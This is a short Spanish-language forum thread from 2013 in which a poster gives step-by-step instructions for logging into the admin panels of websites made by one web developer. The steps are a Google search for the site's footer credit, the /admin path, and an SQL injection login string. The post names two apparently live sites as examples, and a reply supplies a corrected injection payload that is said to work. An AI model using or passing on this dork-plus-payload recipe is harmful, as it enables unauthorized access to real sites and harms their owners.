Título: vulnerabilidad en páginas "by www.SmartySolution.com.au" Publicado por: xliberaciones en 8 Enero 2013, 17:48 pm entramos en google
ponemos "by www.SmartySolution.com.au" para entrar en panel de control añadimos esto /admin usuario y contraseña 'or'1=1 ejemplo http://www.plumbcad.com.au/admin http://www.g4glass.com.au/admin/ Título: Re: vulnerabilidad en páginas "by www.SmartySolution.com.au" Publicado por: WHK en 8 Enero 2013, 17:58 pm No funciona con 'or'1=1 pero si funciona con ' or 1=1 -- '
Gracias por la info :) podrias publicarlo en seclist.org tambien (sección full disclosure). Título: Re: vulnerabilidad en páginas "by www.SmartySolution.com.au" Publicado por: Stakewinner00 en 8 Enero 2013, 18:03 pm interesante....
|